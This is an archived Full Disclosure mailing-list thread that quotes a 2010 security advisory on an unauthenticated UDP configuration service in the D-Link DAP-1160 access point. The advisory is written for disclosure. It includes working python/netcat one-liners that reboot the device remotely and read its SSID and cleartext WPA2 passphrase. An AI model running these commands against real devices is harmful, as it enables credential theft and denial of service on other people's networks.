Full Disclosure mailing list archives
Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
From: Cristofaro Mune <pulsoid () icysilence org>
Date: Mon, 28 Jun 2010 17:28:33 +0200
Being the D-Link DAP-1160 an Access Point and not a router it does not have a specific WAN interface. Nonetheless, the UDP 2003 port is open and reachable from all the available interfaces on this device. Best Regards, Cristofaro Mune Gary Baribault wrote:
Is that UDP 2003 open on the WAN interface as well? Gary Baribault On 06/28/2010 09:50 AM, Cristofaro Mune wrote:Security AdvisoryIS-2010-004 - D-Link DAP-1160 Unauthenticated RemoteConfigurationAdvisory Information--------------------Published:2010-06-28Updated:2010-06-28Manufacturer: D-LinkModel: DAP-1160Firmware version: 1.20b061.30b101.31b01Vulnerability Details---------------------Public References:Not AssignedPlatform:Successfully tested on D-Link DAP-1160 loaded with firmwareversions:v120b06, v130b10, v131b01.Other models and/or firmware versions may be also affected.Note: Only firmware version major numbers are displayed on theadministration web interface: 1.20, 1.30, 1.31Background Information:D-Link DAP-1160 is a wireless access points that allow wirelessclientsconnectivity to wired networks.Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2supported.Summary:Unauthenticated access and modification of several deviceparameters,including Wi-Fi SSID, keys and passphrases is possible.Unauthenticated remote reboot of the device can be alsoperformed.Details:DCCD is an UDP daemon that listens on port UDP 2003 of thedevice, thatis likely used for easy device configuration via the DCC (D-LinkClick'n Connect) protocol.By sending properly formatted UDP datagrams to dccd daemon it ispossible to perform security relevant operation without anypreviousauthentication.It is possible to remotely retrieve sensitive wirelessconfigurationparameters, such as Wi-Fi SSID, Encryption types, keys andpassphrases,along with other additional information.It is also possible to remotely modify such parameters andconfigure thedevice without any knowledge of the web administration password.Remote reboot is another operation that an attacker may performin anunauthenticated way, possibly triggering a Denial-of-Servicecondition.POC:- Remote rebootpython -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR>2003- Retrieving Wi-Fi SSIDpython -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -ossid.txt-u <IP_ADDR> 2003cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in thereceived datagram)- Retrieving WPA2 PSKpython -c 'print "\x03" + "\x00" * 7 +"\x23\x27\x00\x00\x24\x27\x00"' |nc -u -o pass.txt <IP_ADDR> 2003cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx"in thereceived datagram)Impacts:Remote extraction of sensitive informationModification of existing device configurationPOssible Denial-of-ServiceSolutions & Workaround:Not availableAdditional Information----------------------Timeline (dd/mm/yy):17/02/2010: Vulnerability discovered17/02/2010: No suitable technical/security contact onGlobal/Regionalwebsite. No contact available on OSVDB website18/02/2010: Point of contact requested to customer service----------- No response -----------26/05/2010: Partial disclosure at CONFidence 201028/06/2010: This advisoryAdditional information available at http://www.icysilence.org_______________________________________________Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)